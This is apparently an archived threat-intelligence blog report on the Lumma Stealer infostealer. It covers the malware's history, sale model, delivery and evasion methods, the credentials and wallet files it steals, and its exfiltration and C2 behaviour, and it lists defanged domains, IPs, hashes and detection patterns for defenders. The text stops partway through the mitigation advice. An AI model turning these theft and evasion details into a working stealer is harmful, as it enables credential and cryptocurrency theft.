{ "id": "2863db3c-7c5c-42eb-a860-984c0d567ba4", "created_at": "2026-04-06T00:06:16.988255Z", "updated_at": "2026-04-10T03:37:09.071748Z", "deleted_at": null, "sha1_hash": "446997379ebdfde8c75fcafaa57cbefc97fc6ef4", "title": "Lumma Stealer — A Proliferating Threat in the Cybercrime Landscape", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 509401, "plain_text": "Lumma Stealer — A Proliferating Threat in the Cybercrime Landscape\r\nBy BeGoodToAll\r\nPublished: 2025-07-26 · Archived: 2026-04-05 19:38:30 UTC\r\nPress enter or click to view image in full size\r\nExecutive Summary: Lumma Stealer, also recognized as LummaC2, Lummac, or simply Lumma, stands as one of the most\r\nprominent and rapidly evolving information stealer threats within the global cybersecurity landscape. Functioning under a\r\nMalware-as-a-Service (MaaS) model, it empowers cybercriminals of varying technical proficiencies to execute\r\nsophisticated data theft operations with relative ease. The malware’s continuous development, incorporation of advanced\r\nevasion techniques, and utilization of diverse distribution vectors have contributed significantly to its widespread adoption\r\nand market dominance. This poses substantial financial, reputational, and operational risks to both individuals and\r\norganizations across numerous critical infrastructure sectors. Although recent coordinated takedown initiatives by\r\ninternational law enforcement and private sector partners have successfully disrupted its infrastructure, the underlying threat\r\npersists as operators inevitably seek to rebuild or enhance their capabilities.\r\nIntroduction: Information stealers are a category of malware specifically designed to covertly gather and exfiltrate sensitive\r\ndata from compromised devices. Historically, they have represented a persistent threat, with early notable variants like ZeuS\r\nemerging as far back as 2006, and have progressively evolved in sophistication and prevalence. Lumma Stealer epitomizes\r\nthis evolution, offering an accessible yet highly potent tool for cybercriminals to acquire a wide range of valuable\r\ninformation, spanning from login credentials and financial details to cryptocurrency wallets and personally identifiable\r\ninformation. This comprehensive report delves into Lumma Stealer’s origins, its developmental timeline, core operational\r\ncharacteristics (Tactics, Techniques, and Procedures — TTPs), the key threat actors involved, its impact on the broader\r\ncybercrime ecosystem, and concludes with strategic observations and actionable mitigation recommendations.\r\nHistory of Lumma Stealer: Lumma Stealer, recognized by its various aliases including LummaC2, Lummac, and Lumma,\r\nis a highly sophisticated information-stealing malware strain. It was first observed in the security community around\r\nAugust 2022 and has maintained an active presence, being advertised and sold on various underground forums and\r\nTelegram channels since its inception.\r\nhttps://medium.com/@raghavtiresearch/lumma-stealer-a-proliferating-threat-in-the-cybercrime-landscape-b5cdc3de44a4\r\nPage 1 of 8\n\nEvolution Stages and Timeline: Since its initial appearance in 2022, Lumma Stealer has undergone significant and\r\nfrequent development, incorporating new updates and versions aimed at continuously enhancing its capabilities and\r\nevading detection. Microsoft Threat Intelligence has documented up to six distinct versions of Lumma Stealer, each\r\nprimarily focused on refining anti-antivirus techniques and introducing changes to its Command and Control (C2)\r\ncommunication protocols and data formats.\r\n2022:\r\nAugust: Lumma Stealer is first observed within the cybersecurity community.\r\nLate 2022 / December: LummaC2 is formally established and marketed as a Malware-as-a-Service (MaaS) offering,\r\nsold through underground forums. Its initial price point is around $250.\r\n2023:\r\nJanuary-April: Darktrace observes and investigates multiple instances of Lumma stealer activity across its customer\r\nbase, with prominent activity noted in EMEA and the US, including confirmed data exfiltration.\r\nFebruary: A specific spear-phishing campaign targets a South Korean streamer, impersonating Bandai Namco to\r\ndeliver Lumma Stealer.\r\nAugust: LummaC2 is offered at a discounted rate during a subscription sale, indicating a structured business model.\r\nSeptember: A new update is released by its developers, promising infrastructure and stability improvements. Silent\r\nPush identifies over 150 new Lumma C2 Indicators of Compromise (IOCs) through advanced behavioral\r\nfingerprinting and content similarity scans. LummaC2 v4.0 begins incorporating Control Flow Flattening\r\nobfuscation into its default builds.\r\nNovember: The developer, “Shamel,” publicly states in an interview that he has approximately “400 active clients”.\r\nReports emerge detailing LummaC2 v4.0’s novel anti-sandbox technique, which leverages trigonometry to detect\r\nhuman mouse activity, thereby delaying its malicious payload detonation if no human interaction is detected.\r\nNovember 2023 — May 2025: A joint advisory incorporates IOCs gathered from LummaC2 malware infections\r\nduring this period.\r\nLate 2023/Early 2024: LummaC2 developers transition their data exfiltration capabilities to use HTTPS over\r\nplaintext HTTP to bypass network-based detection controls. They also begin leveraging Cloudflare services to\r\nenhance the resilience and availability of their exfiltration infrastructure.\r\n2024:\r\nApril-June: More than 21,000 market listings selling LummaC2-obtained logs are observed, representing a 71.7%\r\nincrease compared to the same period in 2023.\r\nH1-H2: ESET telemetry records a massive 369% increase in detections of Lumma Stealer from the first half to the\r\nsecond half of 2024.\r\nJune: The Chilean National Computer Security Incident Response Team (CSIRT) reports a significant surge in\r\nLummaStealer distribution via phishing emails, deceptive websites, and “clickfix” techniques. ESET Research\r\nidentifies Lumma Stealer targeting players of the popular Hamster Kombat mobile clicker game through malicious\r\nGitHub repositories disguised as helpful automation tools.\r\nJuly: SecurityHQ analysts observe Lumma Stealer’s global impact across multiple industries, including IT, media,\r\nand manufacturing.\r\nOctober: The Cyber Express highlights a campaign where LummaStealer, in conjunction with the Amadey Bot,\r\nspecifically targets the manufacturing industry through phishing and malicious downloads. LummaC2 gains\r\nsignificant popularity after the October 2024 takedown of the RedLine and Meta stealers during “Operation\r\nMagnus,” creating a noticeable void in the infostealer market.\r\nNovember: Red Canary publishes insights into LummaC2’s “paste-and-run” social engineering tactic.\r\nDecember: A LummaC2 threat is detailed, involving a fake CAPTCHA paste-and-run lure that leads to the execution\r\nof an encoded PowerShell script. LummaC2 version 4.0 is submitted to the Malware Bazaar database.\r\nThroughout 2024: LummaC2 developers continuously integrate new features to maintain their competitive edge in\r\nthe stealer market. This includes implementing functionality to send stolen information piecemeal during exfiltration,\r\nensuring data theft even if the malware’s operation is interrupted. They also rapidly adopt new techniques to acquire\r\nbrowser cookies and bypass Application-Bound Encryption (ABE) in Chromium browsers.\r\n2025:\r\nJanuary: In an interview, the developer behind Lumma expresses an intent to cease operations by the following fall,\r\na statement which security researchers advise viewing with skepticism given continued observed activity.\r\nMarch: Microsoft Threat Intelligence identifies a phishing campaign impersonating online travel agency\r\nBooking.com, utilizing Lumma Stealer for financial fraud and theft. Lumma Stealer’s presence on dark web\r\nmarketplaces and Telegram channels continues its growth, boasting over a thousand active subscribers.\r\nMarch 16 — May 16: Microsoft identifies over 394,000 Windows computers globally infected by Lumma\r\nmalware. Concurrently, Alphatechs’ Sphere platform analyzes 881,387 compromised systems from March 20 to May\r\n20, with Lumma Stealer accounting for 242,091 infections (27.5% of the total), indicating its significant prevalence.\r\nhttps://medium.com/@raghavtiresearch/lumma-stealer-a-proliferating-threat-in-the-cybercrime-landscape-b5cdc3de44a4\r\nPage 2 of 8\n\nMay 13 / May 21 / May 22: Microsoft’s Digital Crimes Unit (DCU), in a landmark operation coordinated with\r\ninternational law enforcement agencies (including Europol’s European Cybercrime Center (EC3), the U.S.\r\nDepartment of Justice, and Japan’s Cybercrime Control Center (JC3)), disrupts Lumma Stealer’s infrastructure. This\r\nextensive action involves the seizure of approximately 2,300 malicious domains (over 1,300 by Microsoft, with\r\n300 actioned by law enforcement supported by Europol) and the disruption of critical Command and Control (C2)\r\ninfrastructure. The U.S. Federal Bureau of Investigation (FBI) attributes around 10 million infections to Lumma, and\r\nEuropol describes it as the “world’s most significant infostealer threat”.\r\nMay: A detailed case study highlights an email campaign targeting Canadian organizations, utilizing fake\r\nattachments with harmful PowerShell scripts to deploy hidden payloads. A notable advancement in this specific\r\nvariant is the implementation of a registry-based persistence mechanism, allowing the malware to survive system\r\nreboots.\r\nFuture Predictions: Experts anticipate that Lumma variants will continue to become more sophisticated, evasive, and even\r\neasier to deploy. Expected shifts include the adoption of more advanced persistence mechanisms (such as fileless malware or\r\nobfuscated PowerShell scripts) and a potential transformation into a Ransomware-as-a-Service (RaaS) model. Evasion\r\ntechniques are projected to integrate Artificial Intelligence (AI) and Machine Learning (ML) to bypass antivirus and achieve\r\nreal-time evasion. Furthermore, the scope of targeted data may expand to include biometric authentication data, cloud access\r\ntokens, and financial APIs, further endangering enterprise systems.\r\nWhy it’s So Successful and its Impact on the Stealer Ecosystem and Dominance: Lumma Stealer’s remarkable success\r\nand prominent dominance within the cybercrime landscape are attributable to a combination of strategic and technical\r\nfactors:\r\nMalware-as-a-Service (MaaS) Model: Lumma is extensively sold through a sophisticated MaaS model on\r\nunderground forums and Telegram channels, democratizing access to powerful malware for cybercriminals regardless\r\nof their technical expertise. This model significantly lowers the barrier to entry for launching complex and profitable\r\ncyberattacks.\r\nHigh Success Rate: Lumma is highly effective in successfully infiltrating systems and exfiltrating sensitive data\r\nwithout immediate detection. Its stealthy operational nature allows it to siphon information covertly, multiplying the\r\npotential damage it can inflict.\r\nContinuous Development and Updates: The malware’s developers, primarily “Shamel,” consistently release\r\nupdates and new versions. This agility ensures that Lumma remains difficult to detect, often bypassing host-based\r\ndetection rules implemented for older variants. This includes proactive adaptation to new security measures, such as\r\nGoogle’s Application-Bound Encryption (ABE) in Chromium browsers.\r\nUser-Friendliness and Active Support: Lumma offers an intuitive user interface, comprehensive documentation,\r\nand active customer support, making it highly attractive to a wide spectrum of threat actors, from seasoned criminals\r\nto amateur operators.\r\nExceptional Adaptability and Evasion: Lumma is engineered to swiftly adapt to new environments and capitalize\r\non current trends, including the use of AI tools and software cracks. It employs advanced obfuscation methods (e.g.,\r\nLLVM core, Control Flow Flattening, customized control flow indirection), memory injection, fileless execution\r\ntechniques, and anti-analysis checks (including detecting debuggers and analysis environments) to circumvent\r\ntraditional antivirus tools and sandbox environments. A particularly sophisticated technique in v4.0 involves using\r\ntrigonometry to track mouse movements, delaying payload activation until genuine human activity is detected.\r\nResilient Infrastructure: Its distribution and Command and Control (C2) infrastructure are designed for dynamic\r\nresilience, continually rotating malicious domains, exploiting ad networks, and leveraging legitimate cloud services\r\n(such as Cloudflare) to evade detection and maintain operational continuity. It employs multi-tiered C2 architectures\r\nwith robust fallback mechanisms via Steam profiles and Telegram channels.\r\nComprehensive Data Targeting: Lumma Stealer is capable of targeting and extracting a vast array of sensitive data,\r\nrendering it an extremely valuable commodity in the cybercriminal underground. This stolen data includes:\r\nCredentials saved in web browsers (e.g., Google Chrome, Microsoft Edge, Mozilla, Gecko-based, Brave, Opera),\r\nincluding auto-fill data and password caches. It specifically targets os_crypt.encrypted_key for advanced credential\r\ndecryption.\r\nCookies, which enable attackers to hijack user sessions and bypass multi-factor authentication (MFA).\r\nSensitive files containing financial information, secret keys (including cloud keys), 2FA backup codes, server\r\npasswords, and cryptocurrency private keys and wallet data (e.g., .txt, .pdf, .docx, .rtf files). It actively scans for\r\nspecific keywords such as seed.txt, pass.txt, ledger.txt, trezor.txt, metamask.txt, bitcoin.txt, words, wallet.txt.\r\nPersonal data like ID numbers, addresses, medical records, credit card numbers, and dates of birth.\r\nCryptocurrency wallets and browser extensions associated with popular services like MetaMask, Binance,\r\nElectrum, Ethereum, Exodus, Coinomi, Bitcoin Core, JAXX, and Steem Keychain.\r\nData from remote access tools and password managers, specifically AnyDesk and KeePass.\r\nTwo-factor authentication (2FA) tokens and extensions such as Authenticator, Authy, EOS Authenticator, GAuth\r\nAuthenticator, and Trezor Password Manager.\r\nInformation from VPNs (.ovpn files), various email clients (Gmail, Outlook, Yahoo), and FTP clients.\r\nSystem metadata, including CPU information, operating system version (Windows 7 to Windows 11), system locale,\r\ninstalled applications, username, hardware ID, and screen resolution, useful for profiling victims or tailoring future\r\nhttps://medium.com/@raghavtiresearch/lumma-stealer-a-proliferating-threat-in-the-cybercrime-landscape-b5cdc3de44a4\r\nPage 3 of 8\n\nexploits. It can also capture screenshots.\r\nMarket Dominance: LummaC2 was identified as the most prevalent infostealer in 2023 by ReliaQuest. The\r\nnumber of LummaC2-obtained logs available for sale experienced a 110% increase from Q3 to Q4 2023. SpyCloud\r\nreported an astounding 2000% increase in unique LummaC2 malware records, comprising nearly a quarter of its\r\nweekly ingest by identified variant. Furthermore, Lumma Stealer’s exfiltrated logs are significantly larger, averaging\r\nalmost three times the size of comparable logs from other prominent infostealers like RedLine, Vidar, and Raccoon.\r\nIts ascendancy was partly propelled by the takedown of competing stealers, RedLine and Meta, creating a market\r\nvoid that Lumma rapidly filled. Lumma has also been observed as a significant component in attacks against critical\r\ninfrastructure sectors, including manufacturing, telecommunications, logistics, finance, and healthcare.\r\nThreat Actor Associated with the Lumma Stealer: The primary developer of Lumma Stealer is based in Russia and\r\noperates under the internet alias “Shamel”. Shamel is also known to use the aliases “Lumma” and “LummaC2”.\r\nMicrosoft Threat Intelligence tracks the individual responsible for the development and maintenance of the Lumma malware\r\nand its associated infrastructure under the designation Storm-2477. The malware is additionally associated with the actor\r\ngroup Angry Likho. Shamel actively markets different subscription tiers for Lumma via Telegram and various other\r\nRussian-language chat forums. As of November 2023, Shamel claimed to have approximately 400 active clients utilizing his\r\nservice.\r\nTactics, Techniques, and Procedures (TTPs): Lumma Stealer leverages a complex and continually evolving infection\r\nchain, distinguished by its multi-vector delivery strategies and highly sophisticated evasion techniques.\r\nGet BeGoodToAll’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nInitial Access (Delivery Methods):\r\nPhishing Emails: This remains a primary infection vector. Threat actors send malicious attachments or embedded\r\nlinks in emails, often impersonating well-known brands (e.g., Booking.com, Microsoft) or services to create a sense\r\nof urgency. These emails direct victims to cloned legitimate-looking websites or malicious servers that subsequently\r\ndeploy the Lumma payload. Specifically, spear-phishing attachments and hyperlinks are frequently employed.\r\nMalvertising: Adversaries inject fake advertisements into search engine results, particularly targeting software-related queries such as “Notepad++ download” or “Chrome update.” Clicking these poisoned links diverts users to\r\ncloned websites that mimic legitimate vendors but deliver Lumma Stealer instead.\r\nTrojanized Applications / Cracked Software: Lumma binaries are commonly bundled with compromised or pirated\r\nversions of popular legitimate applications (e.g., ChatGPT, Vegas Pro, VLC, Mp3tag) and then distributed through\r\nfile-sharing platforms or “webhards”. These modified installers are designed to execute the malware silently after the\r\nlegitimate software installation completes.\r\nDrive-by Downloads on Compromised Websites: Threat actors compromise legitimate websites, often exploiting\r\nspecific vulnerabilities or misconfigurations. They then insert malicious JavaScript into the site content. When\r\nunsuspecting users visit these modified sites, the JavaScript executes, leading to the direct delivery of a payload, an\r\nintermediary script, or presenting further lures to trick users into performing an action.\r\nAbuse of Legitimate Services and ClickFix: Public code repositories like GitHub are misused to host malicious\r\nscripts and binaries, often disguised as legitimate development tools or utilities. A particularly deceptive method\r\ninvolves fake CAPTCHA pages commonly found within the “ClickFix” ecosystem. Targets are social-engineered\r\ninto copying malicious commands into their system’s Run utility under the false pretense of passing a verification\r\ncheck. These commands frequently download and execute Lumma directly in memory using Base64 encoding and\r\nother stealthy delivery chains.\r\nDropped by Other Malware: Lumma Stealer is often delivered as a secondary payload by other initial access\r\nloaders and malware families, including DanaBot, Amadey Bot, RedLine Stealer, PrivateLoader, and HijackLoader.\r\nExecution \u0026 Evasion Techniques:\r\nObfuscation: The malware’s core binary is heavily obfuscated using advanced protection methods such as Low-Level Virtual Machine (LLVM core), Control Flow Flattening (CFF), Control Flow Obfuscation, customized stack\r\ndecryption, large stack variables, and dead code insertion, making static analysis extremely challenging. It also\r\nemploys custom obfuscation techniques to mask stolen data during network transmission. Newer versions of\r\nLummaC2 (LUMMAC.V2) leverage customized control flow indirection to manipulate program execution,\r\neffectively thwarting reverse engineering tools like IDA Pro and Ghidra.\r\nAnti-Analysis/Anti-Sandbox: Lumma incorporates sophisticated anti-analysis and detection evasion techniques.\r\nLummaC2 v4.0 notably introduces an advanced anti-sandbox mechanism that utilizes trigonometry to track mouse\r\nmovements. The malware will only proceed with its full payload if significant human activity (angles between\r\nconsecutive cursor movements lower than a predefined threshold, e.g., 45 degrees) is detected, thereby evading\r\nanalysis in automated sandbox environments. It is also known to inject malicious code into legitimate Windows\r\nprocesses to further hide its activity.\r\nhttps://medium.com/@raghavtiresearch/lumma-stealer-a-proliferating-threat-in-the-cybercrime-landscape-b5cdc3de44a4\r\nPage 4 of 8\n\nUse of Legitimate Tools: The malware frequently employs legitimate Windows tools such as PowerShell and CMD\r\nfor execution to bypass traditional antivirus detections. PowerShell scripts are particularly used for silent launching\r\nof the infection chain.\r\nDLL Side-loading: Lumma Stealer has been observed to use DLL side-loading with vulnerable or cracked software,\r\nexemplified by a trojanized Mp3tag.exe that loads a malicious Lumma Stealer DLL.\r\nInformation Stealing Capabilities:\r\nLumma Stealer targets a comprehensive and evolving set of user data. Instructions for target credentials are often\r\nspecified in a dynamic configuration file retrieved from the C2 server, allowing for flexible targeting.\r\nCredentials: Extracts saved passwords, auto-fill data, and password caches from a wide range of web browsers\r\nincluding Google Chrome, Microsoft Edge, Mozilla, Gecko-based browsers, Brave, and Opera. It specifically steals\r\nthe os_crypt.encrypted_key field, which can be used for further credential decryption.\r\nCookies: Steals session cookies from browsers, enabling attackers to hijack user sessions and potentially bypass two-factor authentication (2FA).\r\nFiles: Harvests files containing financial information, secret keys (including cloud keys), 2FA backup codes, server\r\npasswords, and cryptocurrency private keys and wallet data. It systematically collects files from user profiles and\r\ncommon directories, prioritizing .pdf, .docx, or .rtf extensions. It also actively scans for files containing specific\r\nkeywords like seed.txt, pass.txt, ledger.txt, trezor.txt, metamask.txt, bitcoin.txt, words, wallet.txt.\r\nPersonal Data: Includes ID numbers, addresses, medical records, credit card numbers, and dates of birth.\r\nCryptocurrency Wallets \u0026 Extensions: Actively searches for wallet files, browser extensions, and local keys\r\nassociated with a wide range of cryptocurrency services such as MetaMask, Binance, Electrum, Ethereum, Exodus,\r\nCoinomi, Bitcoin Core, JAXX, and Steem Keychain.\r\nOther Applications: Targets data from various Virtual Private Networks (VPNs) (specifically .ovpn files), email\r\nclients (e.g., Gmail, Outlook, Yahoo), FTP clients, remote desktop software (e.g., AnyDesk), password managers\r\n(e.g., KeePass), and Telegram applications.\r\nSystem Metadata: Collects detailed host telemetry, including CPU information, operating system version\r\n(compatible with Windows 7 through Windows 11), system locale, installed applications, username, hardware ID,\r\nand screen resolution. This information is often used for victim profiling or tailoring subsequent exploits. The\r\nmalware can also capture screenshots of the infected system.\r\nData Exfiltration:\r\nAll stolen information is typically organized and gathered into multiple ZIP files, which are then transmitted one by\r\none to the Command and Control (C2) server.\r\nCommunication with the C2 server is predominantly performed over encrypted HTTP or HTTPS POST requests,\r\noften disguised as legitimate network traffic to avoid detection. Commonly observed URI paths for these requests\r\ninclude /api and /c2sock, and a distinct user agent string, “TeslaBrowser/5.5,” is often used.\r\nRecent evasive techniques include embedding exfiltration routines directly within PowerShell commands,\r\neffectively creating fileless methods. Additionally, the malware has begun abusing legitimate cloud-based services\r\nlike Telegram for data exfiltration, sending stolen data through seemingly benign communication platforms to\r\nreduce the likelihood of triggering security alerts.\r\nA significant evolution in its exfiltration routine involves sending information piecemeal (bit by bit) rather than\r\ncollecting all data at once before sending. This makes the malware more resilient, allowing for partial logs to be\r\nexfiltrated even if the malware is detected or stopped mid-execution.\r\nPersistence Mechanisms:\r\nWhile earlier versions of LummaC2 were considered non-persistent (exiting after data exfiltration), recent variants\r\nhave introduced registry-based persistence. This mechanism allows the malware to survive system reboots and\r\nremain active on infected machines, typically by creating an entry in the Windows Registry’s Run key (e.g.,\r\nHKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run). LummaC2’s overall effectiveness is partly attributed\r\nto its focus on establishing system persistence, which enables it to await further payloads or commands.\r\nCommand and Control (C2) Communication:\r\nLumma Stealer establishes communication with its C2 servers to facilitate the exfiltration of stolen data.\r\nThe C2 infrastructure is characterized by its dynamic and resilient nature, constantly rotating malicious domains and\r\nactively leveraging legitimate cloud services to maintain operational continuity and evade detection.\r\nIt employs a multi-tiered C2 infrastructure, which includes a set of frequently changing Tier-1 domains hard-coded\r\ninto the malware’s configuration. It also utilizes fallback C2s hosted on seemingly innocuous platforms such as\r\nSteam profiles and Telegram channels, which then redirect to the primary Tier-1 C2s.\r\nObserved C2 domains include reinforcenh[.]shop, stogeneratmns[.]shop, fragnantbui[.]shop, drawzhotdog[.]shop,\r\nvozmeatillu[.]shop, offensivedzvju[.]shop, ghostreedmnu[.]shop, gutterydhowi[.]shop, Predatowpmn[.]shop,\r\nFileworld[.]shop, pang-scrooge-carnage[.]shop, Preachstrwnwjw[.]shop, Complainnykso[.]shop,\r\nshepherdlyopzc[.]shop, languagedscie[.]shop, unseaffarignsk[.]shop, celebratioopz[.]shop, warrantelespsz[.]shop,\r\ndefenddsouneuw[.]shop, callosallsaospz[.]shop, covvercilverow[.]shop, liernessfornicsa[.]shop,\r\nhttps://medium.com/@raghavtiresearch/lumma-stealer-a-proliferating-threat-in-the-cybercrime-landscape-b5cdc3de44a4\r\nPage 5 of 8\n\ndeallerospfosu[.]shop, indexterityszcoxp[.]shop, futureddospzmvq[.]shop, crowdstrike-office365[.]com,\r\ncomplaintsipzzx[.]shop, erorblackday[.]xyz, curtainjors[.]fun, starblack[.]fun, and solve.gevaq[.]com.\r\nAssociated C2 IP addresses include 89.187.169[.]3, 146.19.128[.]68, 195[.]123[.]226[.]91, 144[.]76[.]173[.]247,\r\n184[.]30[.]21[.]171, 104[.]26[.]2[.]16, 188[.]114[.]96[.]3, 45.9.74[.]78, 77.73.134[.]68, 82.117.255[.]127,\r\n82.117.255[.]80, 82.118.23[.]50.\r\nCommunication from the malware to the C2 server is typically one-way, meaning the malware does not necessarily\r\nexpect a response back from its C2 for its operations to continue.\r\nGeneral IOCs:\r\nHashes: Specific SHA1 and SHA256 hashes of LummaC2 samples are provided. Examples include\r\nafdefcd9eb251202665388635c0109b5f7b4c0a5,\r\na9e9d7770ff948bb65c0db24431f75dd934a803181afa22b6b014fac9a162dab,\r\ne264ba0e9987b0ad0812e5dd4dd3075531cfe269, 128a085b84667420359bfd5b7bad0a431ca89e35,\r\n99b8464e2aabff3f35899ead95dfac83f5edac51, 9f3651ad5725848c880c24f8e749205a7e1e78c1,\r\na01fa9facf3a13c5a9c079d79974842abff2a3f2, f2c37ad5ca8877186c846b6dfb2cb761f5353305,\r\nf89f91e33bf59d0a07dfb1c4d7246d74a05dd67d,\r\naca54f9f5398342566e02470854aff48c53659be0c0cb83d3ce1fd05430375f8,\r\n865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4,\r\n1e06ef09d9e487fd54dbb70784898bff5c3ee25d87f468c9c5d0dfb8948fb45c,\r\n280900902df7bb855b27614884b369e5e0da25ff22efacc59443a4f593ccd145,\r\n2856b7d3948dfb5231056e52437257757839880732849c2e2a35de3103c64768,\r\n3ed535bbcd9d4980ec8bc60cd64804e9c9617b7d88723d3b05e6ad35821c3fe7,\r\n277d7f450268aeb4e7fe942f70a9df63aa429d703e9400370f0621a438e918bf,\r\nb97965e4a793ec0fa10abc86d0c6be5718716d8a, 9ac88b93fee8f888cabc3d0c9d81507c6dad7498,\r\n2c11592f527a35c3dac75139e870dd062b12dfe1, c43316ddcb51e143ab53f996587c23ea4985f6ea,\r\nd932ee10f02ea5bb60ed867d9687a906f1b8472f01fc5543b06f9ab22059b264\r\nC2 Domains and IP Addresses: The extensive lists of observed C2 domains and IP addresses (detailed in the\r\n“Command and Control (C2) Communication” section above) can be incorporated into network-based detection\r\nrules.\r\nURLs: Malicious URLs used for distribution or C2 communication, such as hxxp://ebalkayiu[.]fun/api,\r\nhxxps://1july[.]com/rMKNqt3S,\r\nhxxps://download2361.mediafire[.]com/kz5hd3dkenwgED02vBaT_kwGFdmwQ1iAY4QGf3SAcLidcmbEn-K1HrKyPpR6ADOq7VjezmdEoNhZJFB_Wze08J1MU0iH_oPWGS6Myj12LuXef9l7y_Em63yxedx88ezRHTt44POY858wKHjwxqr2errwIunSIH\r\n2023_Setup.rar, https[:]//win15.b-cdn[.]net/win15.txt, https[:]//win15.b-cdn[.]net/win15.zip, and\r\nhttps://steamcommunity[.]com/profiles/76561199724331900 can be used to craft rules for web proxies and network\r\nintrusion detection systems.\r\nUser Agents: The unique HTTP User-Agent string “TeslaBrowser/5.5” observed during C2 communication is a\r\nstrong indicator for network detection.\r\nRegistry Entries: The creation of specific persistence entries in the Windows Registry, particularly within the\r\nHKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run key, can be monitored.\r\nFile Paths: Monitoring for downloads to specific hidden folders under the user’s AppData directory (e.g., [User\r\nProfile]\\AppData\\Roaming\\bFylC6zX.zip, C:\\Users\\[User]\\AppData\\Roaming\\7oCDTWYu\\Set-up.exe) and the\r\ncreation of specific files for stolen data like “System.txt” or files in “Important Files/Profile” for .txt files, can be\r\neffective.\r\nProcess Behavior: Detection rules can target unusual HTTP POST requests originating from wininet.dll, suspicious\r\nfile access patterns to browser credential files, and the creation of files matching wallet/browser patterns (e.g.,\r\nkey4.db, logins.json, dp.txt). The invocation of mshta.exe and powershell.exe to download and execute payloads is a\r\nkey process-level indicator.\r\nObfuscated Strings: The specific obfuscated pattern string used by LummaC2 for its Chrome DLL memory searcher\r\n(9sdmLrTRuOE8????p4UMZQLB????jl7CKwIeGWvwDe3YvXN40wd763ssw7Cx????kdamAY3?PdE????6J????\r\n7Qy6S04NP0R????k70a?oAj7a3????????K3smA????maSd?3l4) could be used in file-based or memory-based Yara\r\nrules.\r\nBehavioral Detection: Given Lumma’s advanced evasion, behavioral detection is paramount. Endpoint Detection\r\nand Response (EDR) solutions, such as Microsoft Defender, are recommended for their ability to provide effective\r\nprotection by alerting system users and preventing malware processes during the early stages of an attempted attack.\r\nContinuous monitoring of network activity with Network Intrusion Detection/Prevention Systems (NIDS/NIPS) and\r\nleveraging a Web Application Firewall (WAF) to filter/block suspicious activity can offer comprehensive protection\r\nagainst encrypted payloads. Behavior-based monitoring is crucial to detect unusual activity patterns, such as\r\nsuspicious processes attempting unauthorized network connections, which might be missed by traditional signature-based methods due to Lumma’s sophisticated obfuscation. Darktrace’s anomaly-based approach has been successful\r\nin identifying and providing visibility over Lumma activity.\r\nMajor Strategic Observations:\r\nhttps://medium.com/@raghavtiresearch/lumma-stealer-a-proliferating-threat-in-the-cybercrime-landscape-b5cdc3de44a4\r\nPage 6 of 8\n\nMaaS Proliferation as an Enabler: Lumma Stealer undeniably highlights the profound impact of the MaaS model\r\nin lowering the barrier to entry for cybercrime. This model not only facilitates the rapid distribution and continuous\r\nevolution of sophisticated malware but also empowers a broad spectrum of threat actors, including prominent\r\nransomware groups like Octo Tempest, to execute complex attacks with minimal effort and low operational overhead.\r\nThe increasing availability of such tools means more frequent and widespread attacks, shifting the threat landscape\r\nsignificantly.\r\nPersistent Adaptability and Resilience: The malware’s relentless development cycle and its operators’ agility in\r\nadapting tactics, continuously refining evasion techniques (such as the novel anti-sandbox method utilizing\r\ntrigonometry for human behavior detection), and maintaining a dynamic, resilient infrastructure (through rapid\r\ndomain rotation and leveraging legitimate cloud services like Cloudflare) present an enduring and evolving challenge\r\nfor cybersecurity professionals. This inherent dynamism necessitates a fundamental shift in defensive strategies,\r\nmoving beyond static Indicator of Compromise (IOC)-based approaches towards more robust behavioral and\r\nanomaly-based detection methodologies.\r\nConvergence and Chaining of Threats: The frequent observation of Lumma Stealer being employed in conjunction\r\nwith other malware strains (e.g., Amadey Bot, RedLine, Vidar, Raccoon, Laplas Clipper, DanaBot, PrivateLoader,\r\nNetSupport Manager) and its established role as an initial access vector for subsequent, more severe attacks,\r\nincluding ransomware operations (as evidenced by its connection to the Change Healthcare attack), highlights a\r\ncritical and accelerating trend towards coordinated, multifaceted cyber threats. This synergistic integration\r\nsignificantly amplifies the overall impact of attacks and further complicates detection and remediation efforts for\r\ndefenders.\r\nExploitation of the Human Element as a Critical Vector: The consistent reliance on social engineering tactics —\r\nincluding sophisticated phishing campaigns, deceptive malvertising, and particularly clever “fake CAPTCHA” and\r\n“ClickFix” techniques — underscores that human interaction often remains the initial point of compromise. This\r\nfundamental vulnerability points to the enduring and critical need for significantly enhanced cybersecurity awareness\r\nand continuous training programs for all end-users within an organization.\r\nPost-Takedown Regeneration and Market Dynamics: Despite large-scale, coordinated global disruption\r\noperations led by law enforcement and private sector partners, the established pattern suggests that Lumma Stealer’s\r\ndevelopers are highly likely to attempt to rebuild their infrastructure with even more enhanced evasion capabilities,\r\nor new malware families will rapidly emerge to fill the operational void. This rapid regeneration and market fluidity\r\nemphasize that takedowns, while essential for temporary disruption, are not definitive solutions and necessitate\r\nsustained, proactive monitoring and highly adaptive response capabilities from the cybersecurity community.\r\nMonetization and Value of Stolen Data: The deeply lucrative nature of the stolen data, which is widely traded and\r\nsold on dark web forums, private Telegram channels, and specialized marketplaces (such as Russian Market and\r\nGenesis Market), acts as the core economic fuel for the entire infostealer ecosystem. The sheer volume and\r\ncomprehensive nature of the data exfiltrated by Lumma Stealer make it an exceptionally valuable commodity,\r\nfrequently serving as the foundation for subsequent identity-based attacks, widespread financial fraud, and more\r\ncomplex exploitation campaigns.\r\nMitigations and Recommendations: To effectively protect against Lumma Stealer and similar evolving threats, a multi-layered and proactive cybersecurity approach is absolutely essential.\r\nProactive Threat Intelligence Integration: Implement robust threat intelligence platforms (such as Alphatechs’\r\nSphere, XM Cyber’s CTEM, Bitsight TRACE, Cybereason GSOC, Outpost24 KrakenLabs, and Silent Push) for\r\ncontinuous, real-time monitoring of dark web activity, compromised credentials, and emerging TTPs specific to\r\ninfostealers.\r\nStrengthen Endpoint Protection: Deploy cutting-edge next-generation antivirus (NGAV) and Endpoint Detection\r\nand Response (EDR) solutions (e.g., Microsoft Defender) that are capable of detecting and responding to stealthy and\r\ncontinuously evolving malware variants. Ensure these solutions are regularly updated with the latest threat\r\nintelligence and signatures.\r\nEnhance Email Security: Invest in advanced email filtering and gateway solutions. Implement strict network\r\npolicies (e.g., Group Policy Objects — GPOs) to aggressively block malicious attachments and links from 